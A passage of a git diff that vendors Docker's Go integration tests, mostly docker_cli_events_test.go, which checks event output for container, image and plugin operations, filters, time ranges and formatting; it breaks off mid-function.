+		"A /dev/mqueue":  true,
+		"A /dev/kmsg":    true,
+		"A /dev/fd":      true,
+		"A /dev/ptmx":    true,
+		"A /dev/null":    true,
+		"A /dev/random":  true,
+		"A /dev/stdout":  true,
+		"A /dev/stderr":  true,
+		"A /dev/tty1":    true,
+		"A /dev/stdin":   true,
+		"A /dev/tty":     true,
+		"A /dev/urandom": true,
+		"A /dev/zero":    true,
+	}
+
+	for _, line := range strings.Split(out, "\n") {
+		c.Assert(line == "" || expected[line], checker.True, check.Commentf(line))
+	}
+}
+
+// https://github.com/docker/docker/pull/14381#discussion_r33859347
+func (s *DockerSuite) TestDiffEmptyArgClientError(c *check.C) {
+	out, _, err := dockerCmdWithError("diff", "")
+	c.Assert(err, checker.NotNil)
+	c.Assert(strings.TrimSpace(out), checker.Contains, "Container name cannot be empty")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go
new file mode 100644
index 0000000000..1fbfc742de
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go
@@ -0,0 +1,794 @@
+package main
+
+import (
+	"bufio"
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"os/exec"
+	"strings"
+	"time"
+
+	eventtypes "github.com/docker/docker/api/types/events"
+	eventstestutils "github.com/docker/docker/daemon/events/testutils"
+	"github.com/docker/docker/pkg/integration/checker"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) {
+	name := "events-time-format-test"
+
+	// Start stopwatch, generate an event
+	start := daemonTime(c)
+	time.Sleep(1100 * time.Millisecond) // so that first event occur in different second from since (just for the case)
+	dockerCmd(c, "run", "--rm", "--name", name, "busybox", "true")
+	time.Sleep(1100 * time.Millisecond) // so that until > since
+	end := daemonTime(c)
+
+	// List of available time formats to --since
+	unixTs := func(t time.Time) string { return fmt.Sprintf("%v", t.Unix()) }
+	rfc3339 := func(t time.Time) string { return t.Format(time.RFC3339) }
+	duration := func(t time.Time) string { return time.Now().Sub(t).String() }
+
+	// --since=$start must contain only the 'untag' event
+	for _, f := range []func(time.Time) string{unixTs, rfc3339, duration} {
+		since, until := f(start), f(end)
+		out, _ := dockerCmd(c, "events", "--since="+since, "--until="+until)
+		events := strings.Split(out, "\n")
+		events = events[:len(events)-1]
+
+		nEvents := len(events)
+		c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event
+		containerEvents := eventActionsByIDAndType(c, events, name, "container")
+		c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events))
+
+		c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out))
+		c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out))
+		c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out))
+		c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out))
+		c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out))
+	}
+}
+
+func (s *DockerSuite) TestEventsUntag(c *check.C) {
+	image := "busybox"
+	dockerCmd(c, "tag", image, "utest:tag1")
+	dockerCmd(c, "tag", image, "utest:tag2")
+	dockerCmd(c, "rmi", "utest:tag1")
+	dockerCmd(c, "rmi", "utest:tag2")
+
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "events", "--since=1"},
+		Timeout: time.Millisecond * 2500,
+	})
+	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
+
+	events := strings.Split(result.Stdout(), "\n")
+	nEvents := len(events)
+	// The last element after the split above will be an empty string, so we
+	// get the two elements before the last, which are the untags we're
+	// looking for.
+	for _, v := range events[nEvents-3 : nEvents-1] {
+		c.Assert(v, checker.Contains, "untag", check.Commentf("event should be untag"))
+	}
+}
+
+func (s *DockerSuite) TestEventsLimit(c *check.C) {
+	// Limit to 8 goroutines creating containers in order to prevent timeouts
+	// creating so many containers simultaneously on Windows
+	sem := make(chan bool, 8)
+	numContainers := 17
+	errChan := make(chan error, numContainers)
+
+	args := []string{"run", "--rm", "busybox", "true"}
+	for i := 0; i < numContainers; i++ {
+		sem <- true
+		go func() {
+			defer func() { <-sem }()
+			out, err := exec.Command(dockerBinary, args...).CombinedOutput()
+			if err != nil {
+				err = fmt.Errorf("%v: %s", err, string(out))
+			}
+			errChan <- err
+		}()
+	}
+
+	// Wait for all goroutines to finish
+	for i := 0; i < cap(sem); i++ {
+		sem <- true
+	}
+	close(errChan)
+
+	for err := range errChan {
+		c.Assert(err, checker.IsNil, check.Commentf("%q failed with error", strings.Join(args, " ")))
+	}
+
+	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c))
+	events := strings.Split(out, "\n")
+	nEvents := len(events) - 1
+	c.Assert(nEvents, checker.Equals, 64, check.Commentf("events should be limited to 64, but received %d", nEvents))
+}
+
+func (s *DockerSuite) TestEventsContainerEvents(c *check.C) {
+	dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true")
+
+	out, _ := dockerCmd(c, "events", "--until", daemonUnixTime(c))
+	events := strings.Split(out, "\n")
+	events = events[:len(events)-1]
+
+	nEvents := len(events)
+	c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event
+	containerEvents := eventActionsByIDAndType(c, events, "container-events-test", "container")
+	c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events))
+
+	c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out))
+	c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out))
+	c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out))
+	c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out))
+	c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out))
+}
+
+func (s *DockerSuite) TestEventsContainerEventsAttrSort(c *check.C) {
+	since := daemonUnixTime(c)
+	dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true")
+
+	out, _ := dockerCmd(c, "events", "--filter", "container=container-events-test", "--since", since, "--until", daemonUnixTime(c))
+	events := strings.Split(out, "\n")
+
+	nEvents := len(events)
+	c.Assert(nEvents, checker.GreaterOrEqualThan, 3) //Missing expected event
+	matchedEvents := 0
+	for _, event := range events {
+		matches := eventstestutils.ScanMap(event)
+		if matches["eventType"] == "container" && matches["action"] == "create" {
+			matchedEvents++
+			c.Assert(out, checker.Contains, "(image=busybox, name=container-events-test)", check.Commentf("Event attributes not sorted"))
+		} else if matches["eventType"] == "container" && matches["action"] == "start" {
+			matchedEvents++
+			c.Assert(out, checker.Contains, "(image=busybox, name=container-events-test)", check.Commentf("Event attributes not sorted"))
+		}
+	}
+	c.Assert(matchedEvents, checker.Equals, 2, check.Commentf("missing events for container container-events-test:\n%s", out))
+}
+
+func (s *DockerSuite) TestEventsContainerEventsSinceUnixEpoch(c *check.C) {
+	dockerCmd(c, "run", "--rm", "--name", "since-epoch-test", "busybox", "true")
+	timeBeginning := time.Unix(0, 0).Format(time.RFC3339Nano)
+	timeBeginning = strings.Replace(timeBeginning, "Z", ".000000000Z", -1)
+	out, _ := dockerCmd(c, "events", "--since", timeBeginning, "--until", daemonUnixTime(c))
+	events := strings.Split(out, "\n")
+	events = events[:len(events)-1]
+
+	nEvents := len(events)
+	c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event
+	containerEvents := eventActionsByIDAndType(c, events, "since-epoch-test", "container")
+	c.Assert(containerEvents, checker.HasLen, 5, check.Commentf("events: %v", events))
+
+	c.Assert(containerEvents[0], checker.Equals, "create", check.Commentf(out))
+	c.Assert(containerEvents[1], checker.Equals, "attach", check.Commentf(out))
+	c.Assert(containerEvents[2], checker.Equals, "start", check.Commentf(out))
+	c.Assert(containerEvents[3], checker.Equals, "die", check.Commentf(out))
+	c.Assert(containerEvents[4], checker.Equals, "destroy", check.Commentf(out))
+}
+
+func (s *DockerSuite) TestEventsImageTag(c *check.C) {
+	time.Sleep(1 * time.Second) // because API has seconds granularity
+	since := daemonUnixTime(c)
+	image := "testimageevents:tag"
+	dockerCmd(c, "tag", "busybox", image)
+
+	out, _ := dockerCmd(c, "events",
+		"--since", since, "--until", daemonUnixTime(c))
+
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(events, checker.HasLen, 1, check.Commentf("was expecting 1 event. out=%s", out))
+	event := strings.TrimSpace(events[0])
+
+	matches := eventstestutils.ScanMap(event)
+	c.Assert(matchEventID(matches, image), checker.True, check.Commentf("matches: %v\nout:\n%s", matches, out))
+	c.Assert(matches["action"], checker.Equals, "tag")
+}
+
+func (s *DockerSuite) TestEventsImagePull(c *check.C) {
+	// TODO Windows: Enable this test once pull and reliable image names are available
+	testRequires(c, DaemonIsLinux)
+	since := daemonUnixTime(c)
+	testRequires(c, Network)
+
+	dockerCmd(c, "pull", "hello-world")
+
+	out, _ := dockerCmd(c, "events",
+		"--since", since, "--until", daemonUnixTime(c))
+
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	event := strings.TrimSpace(events[len(events)-1])
+	matches := eventstestutils.ScanMap(event)
+	c.Assert(matches["id"], checker.Equals, "hello-world:latest")
+	c.Assert(matches["action"], checker.Equals, "pull")
+
+}
+
+func (s *DockerSuite) TestEventsImageImport(c *check.C) {
+	// TODO Windows CI. This should be portable once export/import are
+	// more reliable (@swernli)
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	since := daemonUnixTime(c)
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "export", cleanedContainerID),
+		exec.Command(dockerBinary, "import", "-"),
+	)
+	c.Assert(err, checker.IsNil, check.Commentf("import failed with output: %q", out))
+	imageRef := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=import")
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(events, checker.HasLen, 1)
+	matches := eventstestutils.ScanMap(events[0])
+	c.Assert(matches["id"], checker.Equals, imageRef, check.Commentf("matches: %v\nout:\n%s\n", matches, out))
+	c.Assert(matches["action"], checker.Equals, "import", check.Commentf("matches: %v\nout:\n%s\n", matches, out))
+}
+
+func (s *DockerSuite) TestEventsImageLoad(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	myImageName := "footest:v1"
+	dockerCmd(c, "tag", "busybox", myImageName)
+	since := daemonUnixTime(c)
+
+	out, _ := dockerCmd(c, "images", "-q", "--no-trunc", myImageName)
+	longImageID := strings.TrimSpace(out)
+	c.Assert(longImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty"))
+
+	dockerCmd(c, "save", "-o", "saveimg.tar", myImageName)
+	dockerCmd(c, "rmi", myImageName)
+	out, _ = dockerCmd(c, "images", "-q", myImageName)
+	noImageID := strings.TrimSpace(out)
+	c.Assert(noImageID, checker.Equals, "", check.Commentf("Should not have any image"))
+	dockerCmd(c, "load", "-i", "saveimg.tar")
+
+	result := icmd.RunCommand("rm", "-rf", "saveimg.tar")
+	c.Assert(result, icmd.Matches, icmd.Success)
+
+	out, _ = dockerCmd(c, "images", "-q", "--no-trunc", myImageName)
+	imageID := strings.TrimSpace(out)
+	c.Assert(imageID, checker.Equals, longImageID, check.Commentf("Should have same image id as before"))
+
+	out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=load")
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(events, checker.HasLen, 1)
+	matches := eventstestutils.ScanMap(events[0])
+	c.Assert(matches["id"], checker.Equals, imageID, check.Commentf("matches: %v\nout:\n%s\n", matches, out))
+	c.Assert(matches["action"], checker.Equals, "load", check.Commentf("matches: %v\nout:\n%s\n", matches, out))
+
+	out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=save")
+	events = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(events, checker.HasLen, 1)
+	matches = eventstestutils.ScanMap(events[0])
+	c.Assert(matches["id"], checker.Equals, imageID, check.Commentf("matches: %v\nout:\n%s\n", matches, out))
+	c.Assert(matches["action"], checker.Equals, "save", check.Commentf("matches: %v\nout:\n%s\n", matches, out))
+}
+
+func (s *DockerSuite) TestEventsPluginOps(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+
+	since := daemonUnixTime(c)
+
+	dockerCmd(c, "plugin", "install", pNameWithTag, "--grant-all-permissions")
+	dockerCmd(c, "plugin", "disable", pNameWithTag)
+	dockerCmd(c, "plugin", "remove", pNameWithTag)
+
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c))
+	events := strings.Split(out, "\n")
+	events = events[:len(events)-1]
+
+	nEvents := len(events)
+	c.Assert(nEvents, checker.GreaterOrEqualThan, 4)
+
+	pluginEvents := eventActionsByIDAndType(c, events, pNameWithTag, "plugin")
+	c.Assert(pluginEvents, checker.HasLen, 4, check.Commentf("events: %v", events))
+
+	c.Assert(pluginEvents[0], checker.Equals, "pull", check.Commentf(out))
+	c.Assert(pluginEvents[1], checker.Equals, "enable", check.Commentf(out))
+	c.Assert(pluginEvents[2], checker.Equals, "disable", check.Commentf(out))
+	c.Assert(pluginEvents[3], checker.Equals, "remove", check.Commentf(out))
+}
+
+func (s *DockerSuite) TestEventsFilters(c *check.C) {
+	since := daemonUnixTime(c)
+	dockerCmd(c, "run", "--rm", "busybox", "true")
+	dockerCmd(c, "run", "--rm", "busybox", "true")
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=die")
+	parseEvents(c, out, "die")
+
+	out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", "event=die", "--filter", "event=start")
+	parseEvents(c, out, "die|start")
+
+	// make sure we at least got 2 start events
+	count := strings.Count(out, "start")
+	c.Assert(strings.Count(out, "start"), checker.GreaterOrEqualThan, 2, check.Commentf("should have had 2 start events but had %d, out: %s", count, out))
+
+}
+
+func (s *DockerSuite) TestEventsFilterImageName(c *check.C) {
+	since := daemonUnixTime(c)
+
+	out, _ := dockerCmd(c, "run", "--name", "container_1", "-d", "busybox:latest", "true")
+	container1 := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "run", "--name", "container_2", "-d", "busybox", "true")
+	container2 := strings.TrimSpace(out)
+
+	name := "busybox"
+	out, _ = dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("image=%s", name))
+	events := strings.Split(out, "\n")
+	events = events[:len(events)-1]
+	c.Assert(events, checker.Not(checker.HasLen), 0) //Expected events but found none for the image busybox:latest
+	count1 := 0
+	count2 := 0
+
+	for _, e := range events {
+		if strings.Contains(e, container1) {
+			count1++
+		} else if strings.Contains(e, container2) {
+			count2++
+		}
+	}
+	c.Assert(count1, checker.Not(checker.Equals), 0, check.Commentf("Expected event from container but got %d from %s", count1, container1))
+	c.Assert(count2, checker.Not(checker.Equals), 0, check.Commentf("Expected event from container but got %d from %s", count2, container2))
+
+}
+
+func (s *DockerSuite) TestEventsFilterLabels(c *check.C) {
+	since := daemonUnixTime(c)
+	label := "io.docker.testing=foo"
+
+	out, _ := dockerCmd(c, "run", "-d", "-l", label, "busybox:latest", "true")
+	container1 := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "run", "-d", "busybox", "true")
+	container2 := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter", fmt.Sprintf("label=%s", label))
+
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.Equals, 3)
+
+	for _, e := range events {
+		c.Assert(e, checker.Contains, container1)
+		c.Assert(e, checker.Not(checker.Contains), container2)
+	}
+}
+
+func (s *DockerSuite) TestEventsFilterImageLabels(c *check.C) {
+	since := daemonUnixTime(c)
+	name := "labelfiltertest"
+	label := "io.docker.testing=image"
+
+	// Build a test image.
+	_, err := buildImage(name, fmt.Sprintf(`
+		FROM busybox:latest
+		LABEL %s`, label), true)
+	c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image"))
+
+	dockerCmd(c, "tag", name, "labelfiltertest:tag1")
+	dockerCmd(c, "tag", name, "labelfiltertest:tag2")
+	dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3")
+
+	out, _ := dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter", fmt.Sprintf("label=%s", label),
+		"--filter", "type=image")
+
+	events := strings.Split(strings.TrimSpace(out), "\n")
+
+	// 2 events from the "docker tag" command, another one is from "docker build"
+	c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events))
+	for _, e := range events {
+		c.Assert(e, checker.Contains, "labelfiltertest")
+	}
+}
+
+func (s *DockerSuite) TestEventsFilterContainer(c *check.C) {
+	since := daemonUnixTime(c)
+	nameID := make(map[string]string)
+
+	for _, name := range []string{"container_1", "container_2"} {
+		dockerCmd(c, "run", "--name", name, "busybox", "true")
+		id := inspectField(c, name, "Id")
+		nameID[name] = id
+	}
+
+	until := daemonUnixTime(c)
+
+	checkEvents := func(id string, events []string) error {
+		if len(events) != 4 { // create, attach, start, die
+			return fmt.Errorf("expected 4 events, got %v", events)
+		}
+		for _, event := range events {
+			matches := eventstestutils.ScanMap(event)
+			if !matchEventID(matches, id) {
+				return fmt.Errorf("expected event for container id %s: %s - parsed container id: %s", id, event, matches["id"])
+			}
+		}
+		return nil
+	}
+
+	for name, ID := range nameID {
+		// filter by names
+		out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "container="+name)
+		events := strings.Split(strings.TrimSuffix(out, "\n"), "\n")
+		c.Assert(checkEvents(ID, events), checker.IsNil)
+
+		// filter by ID's
+		out, _ = dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "container="+ID)
+		events = strings.Split(strings.TrimSuffix(out, "\n"), "\n")
+		c.Assert(checkEvents(ID, events), checker.IsNil)
+	}
+}
+
+func (s *DockerSuite) TestEventsCommit(c *check.C) {
+	// Problematic on Windows as cannot commit a running container
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := runSleepingContainer(c)
+	cID := strings.TrimSpace(out)
+	c.Assert(waitRun(cID), checker.IsNil)
+
+	dockerCmd(c, "commit", "-m", "test", cID)
+	dockerCmd(c, "stop", cID)
+	c.Assert(waitExited(cID, 5*time.Second), checker.IsNil)
+
+	until := daemonUnixTime(c)
+	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until)
+	c.Assert(out, checker.Contains, "commit", check.Commentf("Missing 'commit' log event"))
+}
+
+func (s *DockerSuite) TestEventsCopy(c *check.C) {
+	// Build a test image.
+	id, err := buildImage("cpimg", `
+		  FROM busybox
+		  RUN echo HI > /file`, true)
+	c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image"))
+
+	// Create an empty test file.
+	tempFile, err := ioutil.TempFile("", "test-events-copy-")
+	c.Assert(err, checker.IsNil)
+	defer os.Remove(tempFile.Name())
+
+	c.Assert(tempFile.Close(), checker.IsNil)
+
+	dockerCmd(c, "create", "--name=cptest", id)
+
+	dockerCmd(c, "cp", "cptest:/file", tempFile.Name())
+
+	until := daemonUnixTime(c)
+	out, _ := dockerCmd(c, "events", "--since=0", "-f", "container=cptest", "--until="+until)
+	c.Assert(out, checker.Contains, "archive-path", check.Commentf("Missing 'archive-path' log event\n"))
+
+	dockerCmd(c, "cp", tempFile.Name(), "cptest:/filecopy")
+
+	until = daemonUnixTime(c)
+	out, _ = dockerCmd(c, "events", "-f", "container=cptest", "--until="+until)
+	c.Assert(out, checker.Contains, "extract-to-dir", check.Commentf("Missing 'extract-to-dir' log event"))
+}
+
+func (s *DockerSuite) TestEventsResize(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cID := strings.TrimSpace(out)
+	c.Assert(waitRun(cID), checker.IsNil)
+
+	endpoint := "/containers/" + cID + "/resize?h=80&w=24"
+	status, _, err := sockRequest("POST", endpoint, nil)
+	c.Assert(status, checker.Equals, http.StatusOK)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "stop", cID)
+
+	until := daemonUnixTime(c)
+	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until)
+	c.Assert(out, checker.Contains, "resize", check.Commentf("Missing 'resize' log event"))
+}
+
+func (s *DockerSuite) TestEventsAttach(c *check.C) {
+	// TODO Windows CI: Figure out why this test fails intermittently (TP5).
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-di", "busybox", "cat")
+	cID := strings.TrimSpace(out)
+	c.Assert(waitRun(cID), checker.IsNil)
+
+	cmd := exec.Command(dockerBinary, "attach", cID)
+	stdin, err := cmd.StdinPipe()
+	c.Assert(err, checker.IsNil)
+	defer stdin.Close()
+	stdout, err := cmd.StdoutPipe()
+	c.Assert(err, checker.IsNil)
+	defer stdout.Close()
+	c.Assert(cmd.Start(), checker.IsNil)
+	defer cmd.Process.Kill()
+
+	// Make sure we're done attaching by writing/reading some stuff
+	_, err = stdin.Write([]byte("hello\n"))
+	c.Assert(err, checker.IsNil)
+	out, err = bufio.NewReader(stdout).ReadString('\n')
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello", check.Commentf("expected 'hello'"))
+
+	c.Assert(stdin.Close(), checker.IsNil)
+
+	dockerCmd(c, "kill", cID)
+	c.Assert(waitExited(cID, 5*time.Second), checker.IsNil)
+
+	until := daemonUnixTime(c)
+	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until)
+	c.Assert(out, checker.Contains, "attach", check.Commentf("Missing 'attach' log event"))
+}
+
+func (s *DockerSuite) TestEventsRename(c *check.C) {
+	out, _ := dockerCmd(c, "run", "--name", "oldName", "busybox", "true")
+	cID := strings.TrimSpace(out)
+	dockerCmd(c, "rename", "oldName", "newName")
+
+	until := daemonUnixTime(c)
+	// filter by the container id because the name in the event will be the new name.
+	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until", until)
+	c.Assert(out, checker.Contains, "rename", check.Commentf("Missing 'rename' log event\n"))
+}
+
+func (s *DockerSuite) TestEventsTop(c *check.C) {
+	// Problematic on Windows as Windows does not support top
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := runSleepingContainer(c, "-d")
+	cID := strings.TrimSpace(out)
+	c.Assert(waitRun(cID), checker.IsNil)
+
+	dockerCmd(c, "top", cID)
+	dockerCmd(c, "stop", cID)
+
+	until := daemonUnixTime(c)
+	out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until)
+	c.Assert(out, checker.Contains, " top", check.Commentf("Missing 'top' log event"))
+}
+
+// #14316
+func (s *DockerRegistrySuite) TestEventsImageFilterPush(c *check.C) {
+	// Problematic to port for Windows CI during TP5 timeframe until
+	// supporting push
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, Network)
+	repoName := fmt.Sprintf("%v/dockercli/testf", privateRegistryURL)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	cID := strings.TrimSpace(out)
+	c.Assert(waitRun(cID), checker.IsNil)
+
+	dockerCmd(c, "commit", cID, repoName)
+	dockerCmd(c, "stop", cID)
+	dockerCmd(c, "push", repoName)
+
+	until := daemonUnixTime(c)
+	out, _ = dockerCmd(c, "events", "-f", "image="+repoName, "-f", "event=push", "--until", until)
+	c.Assert(out, checker.Contains, repoName, check.Commentf("Missing 'push' log event for %s", repoName))
+}
+
+func (s *DockerSuite) TestEventsFilterType(c *check.C) {
+	since := daemonUnixTime(c)
+	name := "labelfiltertest"
+	label := "io.docker.testing=image"
+
+	// Build a test image.
+	_, err := buildImage(name, fmt.Sprintf(`
+		FROM busybox:latest
+		LABEL %s`, label), true)
+	c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image"))
+
+	dockerCmd(c, "tag", name, "labelfiltertest:tag1")
+	dockerCmd(c, "tag", name, "labelfiltertest:tag2")
+	dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3")
+
+	out, _ := dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter", fmt.Sprintf("label=%s", label),
+		"--filter", "type=image")
+
+	events := strings.Split(strings.TrimSpace(out), "\n")
+
+	// 2 events from the "docker tag" command, another one is from "docker build"
+	c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events))
+	for _, e := range events {
+		c.Assert(e, checker.Contains, "labelfiltertest")
+	}
+
+	out, _ = dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter", fmt.Sprintf("label=%s", label),
+		"--filter", "type=container")
+	events = strings.Split(strings.TrimSpace(out), "\n")
+
+	// Events generated by the container that builds the image
+	c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events))
+
+	out, _ = dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter", "type=network")
+	events = strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.GreaterOrEqualThan, 1, check.Commentf("Events == %s", events))
+}
+
+// #25798
+func (s *DockerSuite) TestEventsSpecialFiltersWithExecCreate(c *check.C) {
+	since := daemonUnixTime(c)
+	runSleepingContainer(c, "--name", "test-container", "-d")
+	waitRun("test-container")
+
+	dockerCmd(c, "exec", "test-container", "echo", "hello-world")
+
+	out, _ := dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter",
+		"event='exec_create: echo hello-world'",
+	)
+
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.Equals, 1, check.Commentf(out))
+
+	out, _ = dockerCmd(
+		c,
+		"events",
+		"--since", since,
+		"--until", daemonUnixTime(c),
+		"--filter",
+		"event=exec_create",
+	)
+	c.Assert(len(events), checker.Equals, 1, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestEventsFilterImageInContainerAction(c *check.C) {
+	since := daemonUnixTime(c)
+	dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true")
+	waitRun("test-container")
+
+	out, _ := dockerCmd(c, "events", "--filter", "image=busybox", "--since", since, "--until", daemonUnixTime(c))
+	events := strings.Split(strings.TrimSpace(out), "\n")
+	c.Assert(len(events), checker.GreaterThan, 1, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestEventsContainerRestart(c *check.C) {
+	dockerCmd(c, "run", "-d", "--name=testEvent", "--restart=on-failure:3", "busybox", "false")
+
+	// wait until test2 is auto removed.
+	waitTime := 10 * time.Second
+	if daemonPlatform == "windows" {
+		// Windows takes longer...
+		waitTime = 90 * time.Second
+	}
+
+	err := waitInspect("testEvent", "{{ .State.Restarting }} {{ .State.Running }}", "false false", waitTime)
+	c.Assert(err, checker.IsNil)
+
+	var (
+		createCount int
+		startCount  int
+		dieCount    int
+	)
+	out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c), "-f", "container=testEvent")
+	events := strings.Split(strings.TrimSpace(out), "\n")
+
+	nEvents := len(events)
+	c.Assert(nEvents, checker.GreaterOrEqualThan, 1) //Missing expected event
+	actions := eventActionsByIDAndType(c, events, "testEvent", "container")
+
+	for _, a := range actions {
+		switch a {
+		case "create":
+			createCount++
+		case "start":
+			startCount++
+		case "die":
+			dieCount++
+		}
+	}
+	c.Assert(createCount, checker.Equals, 1, check.Commentf("testEvent should be created 1 times: %v", actions))
+	c.Assert(startCount, checker.Equals, 4, check.Commentf("testEvent should start 4 times: %v", actions))
+	c.Assert(dieCount, checker.Equals, 4, check.Commentf("testEvent should die 4 times: %v", actions))
+}
+
+func (s *DockerSuite) TestEventsSinceInTheFuture(c *check.C) {
+	dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true")
+	waitRun("test-container")
+
+	since := daemonTime(c)
+	until := since.Add(time.Duration(-24) * time.Hour)
+	out, _, err := dockerCmdWithError("events", "--filter", "image=busybox", "--since", parseEventTime(since), "--until", parseEventTime(until))
+
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "cannot be after `until`")
+}
+
+func (s *DockerSuite) TestEventsUntilInThePast(c *check.C) {
+	since := daemonUnixTime(c)
+
+	dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true")
+	waitRun("test-container")
+
+	until := daemonUnixTime(c)
+
+	dockerCmd(c, "run", "--name", "test-container2", "-d", "busybox", "true")
+	waitRun("test-container2")
+
+	out, _ := dockerCmd(c, "events", "--filter", "image=busybox", "--since", since, "--until", until)
+
+	c.Assert(out, checker.Not(checker.Contains), "test-container2")
+	c.Assert(out, checker.Contains, "test-container")
+}
+
+func (s *DockerSuite) TestEventsFormat(c *check.C) {
+	since := daemonUnixTime(c)
+	dockerCmd(c, "run", "--rm", "busybox", "true")
+	dockerCmd(c, "run", "--rm", "busybox", "true")
+	out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--format", "{{json .}}")
+	dec := json.NewDecoder(strings.NewReader(out))
+	// make sure we got 2 start events
+	startCount := 0
+	for {
+		var err error
+		var ev eventtypes.Message
+		if err = dec.Decode(&ev); err == io.EOF {
+			break
+		}
+		c.Assert(err, checker.IsNil)
+		if ev.Status == "start" {
+			startCount++
+		}
+	}
+
+	c.Assert(startCount, checker.Equals, 2, check.Commentf("should have had 2 start events but had %d, out: %s", startCount, out))
+}
+
+func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) {
+	// make sure it fails immediately, without receiving any event
